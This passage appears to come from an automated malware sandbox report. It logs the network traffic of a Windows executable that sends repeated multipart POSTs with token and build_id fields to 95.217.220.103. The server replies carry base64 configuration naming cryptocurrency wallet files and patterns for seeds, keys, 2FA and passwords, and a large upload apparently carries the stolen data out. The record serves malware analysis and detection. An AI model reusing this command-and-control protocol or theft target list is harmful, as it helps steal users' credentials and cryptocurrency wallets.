                                                                                                                                                                                                                          Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                          2024-10-23 15:06:21 UTC16384INData Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24
                                                                                                                                                                                                                          Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          18192.168.2.44992295.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:27 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 1145
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:27 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------AKJEGCFBGDHJJJJJKJECCont
                                                                                                                                                                                                                          2024-10-23 15:06:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:27 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          19192.168.2.44993095.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:28 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------JJJEGCGDGHCBFHIDHDAACont
                                                                                                                                                                                                                          2024-10-23 15:06:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:28 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:28 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          20192.168.2.44994195.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:29 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------JDGCFBAFBFHJEBGCAEGHCont
                                                                                                                                                                                                                          2024-10-23 15:06:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:30 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:30 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                                                                          Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          21192.168.2.44995095.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:31 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 461
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:31 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------GDAAKFIDGIEGDGDHIDAKCont
                                                                                                                                                                                                                          2024-10-23 15:06:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:31 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          22192.168.2.44996395.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 99261
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------DBFCBGCGIJKJKECAKEGCCont
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                                                                                                                                                          Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                                                                                                                                                          Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 34 52 2f 52 66 2b 68 73 30 76 38 41 37 2b 4a 2f 38 58 56 79 30 38 45 51 58 38 52 6c 73 39 63 74 72 69 4d
                                                                                                                                                                                                                          Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/4R/Rf+hs0v8A7+J/8XVy08EQX8Rls9ctriM
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 2f 6a 6a 70 57 70 52 52 57 74 4f 6c 43 6c 48 6c 67 72 49 35 36 39 65 70 58 6e 7a 31 48 64 68 52 52 52 57 68 6b 46 46 46 46 41 43 64 36 57 69 69 67 59 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 49 61 57 69 6a 46 4d 59 6c 4c 2b 4e 46 47 4b 41 45 6f 70 63 55 6c 41 42 52 52 52 51 41 55 55 55 55 41 4a 52 53 34 70 4d 55 41 46 46 4c 53 59 6f 41 53 6c 78 52 69 69 67 41 6f 37 30 55 55 44 41 30 6c 4c 53 55 41 46 46 46 46 41 43 55 55 55 59 70 67 46 46 47 4b 4b 42 69 55 55 37 48 74 53 45 55 41 4a 52 53 38 65 6f 6f 79 6f 6f 75 67 45 6f 6f 33 44 30 70 4e 2f 73 4b 4c 6f 4c 4d 4d 55 75 44 54 64 35 70 4e 78 50 63 30 58 48 59 66 69 67 34 48 63 56 48 6e 33 70 4b 4c 6a 73 53 5a 58 31 70 4e 79 30 79 6b 6f 48 59 6b 33 2b 31 4a 35 68 37 55 79 69 67 4c 44 69 35 50 65 6b 7a
                                                                                                                                                                                                                          Data Ascii: /jjpWpRRWtOlClHlgrI569epXnz1HdhRRRWhkFFFFACd6WiigYlFFFABRRRQAUUUUAIaWijFMYlL+NFGKAEopcUlABRRRQAUUUUAJRS4pMUAFFLSYoASlxRiigAo70UUDA0lLSUAFFFFACUUUYpgFFGKKBiUU7HtSEUAJRS8eooyoougEoo3D0pN/sKLoLMMUuDTd5pNxPc0XHYfig4HcVHn3pKLjsSZX1pNy0ykoHYk3+1J5h7UyigLDi5Pekz
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC16355OUTData Raw: 77 56 4e 62 30 4d 62 52 72 76 6c 67 39 54 6b 78 65 57 59 6e 43 52 55 71 69 30 38 68 74 46 46 46 64 5a 77 42 52 52 52 51 41 55 55 55 55 41 46 46 46 4a 51 4d 4b 4b 4b 4b 41 43 69 6a 4a 6f 6f 41 4b 4b 4b 4b 41 43 69 6b 6f 6f 41 4d 30 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 47 6b 6f 70 63 55 41 4a 52 52 52 51 41 55 55 55 55 44 45 4e 46 4c 53 64 4b 59 43 30 6c 47 61 53 69 34 78 61 62 6d 67 30 55 68 68 6b 30 55 55 6c 41 42 52 52 52 51 4d 53 69 67 30 55 41 46 4a 53 30 6c 41 77 70 4b 57 6b 4e 41 42 52 52 52 54 47 42 70 4b 55 30 6c 41 42 53 55 74 4a 51 4d 4b 51 30 74 4a 51 41 55 68 70 61 53 67 59 55 55 55 47 67 42 4b 51 30 74 4a 51 4d 4b 44 52 51 61 42 69 55 55 55 55 44 45 6f 4e 46 42 70 67 49 61 53 6c 70 44 51 4d 4b 53 6c 4e 4a 51 4d 4b 53 6c 70 4b 41 43 67
                                                                                                                                                                                                                          Data Ascii: wVNb0MbRrvlg9TkxeWYnCRUqi08htFFFdZwBRRRQAUUUUAFFFJQMKKKKACijJooAKKKKACikooAM0UUUAFFFFABRRRQAGkopcUAJRRRQAUUUUDENFLSdKYC0lGaSi4xabmg0Uhhk0UUlABRRRQMSig0UAFJS0lAwpKWkNABRRRTGBpKU0lABSUtJQMKQ0tJQAUhpaSgYUUUGgBKQ0tJQMKDRQaBiUUUUDEoNFBpgIaSlpDQMKSlNJQMKSlpKACg
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC1131OUTData Raw: 63 77 43 44 2b 30 72 46 63 7a 57 54 46 67 51 79 38 6a 67 34 32 6b 62 6c 4a 42 4f 44 32 50 4d 56 62 30 37 56 74 53 30 65 64 70 39 4d 31 43 37 73 70 6d 58 59 30 6c 74 4d 30 62 46 65 75 43 56 49 34 34 46 4a 6a 52 36 58 71 6b 4f 71 65 47 4c 4e 6d 4f 72 58 4d 46 35 63 61 74 4a 42 71 6d 72 36 65 6d 5a 79 50 4c 52 6f 68 31 51 6a 63 47 4c 45 46 68 6b 35 7a 6b 69 75 44 38 58 32 6b 39 68 34 76 31 61 31 75 72 76 37 58 63 52 33 4c 69 53 34 38 73 52 2b 61 32 63 6c 74 6f 34 47 66 53 71 74 6e 72 32 73 61 64 64 54 33 56 6a 71 31 2f 62 58 46 77 53 5a 70 6f 4c 6c 30 65 51 6b 35 2b 59 67 35 50 50 50 4e 55 5a 5a 4a 4a 70 58 6c 6c 6b 61 53 52 32 4c 4f 37 6e 4a 59 6e 6b 6b 6e 75 61 45 68 74 6a 4b 37 4c 77 4e 66 33 32 69 75 2b 72 4e 71 45 31 6c 6f 74 76 4f 68 75 78 46 6b 47 38
                                                                                                                                                                                                                          Data Ascii: cwCD+0rFczWTFgQy8jg42kblJBOD2PMVb07VtS0edp9M1C7spmXY0ltM0bFeuCVI44FJjR6XqkOqeGLNmOrXMF5catJBqmr6emZyPLRoh1QjcGLEFhk5zkiuD8X2k9h4v1a1urv7XcR3LiS48sR+a2clto4GfSqtnr2saddT3Vjq1/bXFwSZpoLl0eQk5+Yg5PPPNUZZJJpXllkaSR2LO7nJYnkknuaEhtjK7LwNf32iu+rNqE1lotvOhuxFkG8
                                                                                                                                                                                                                          2024-10-23 15:06:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:35 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
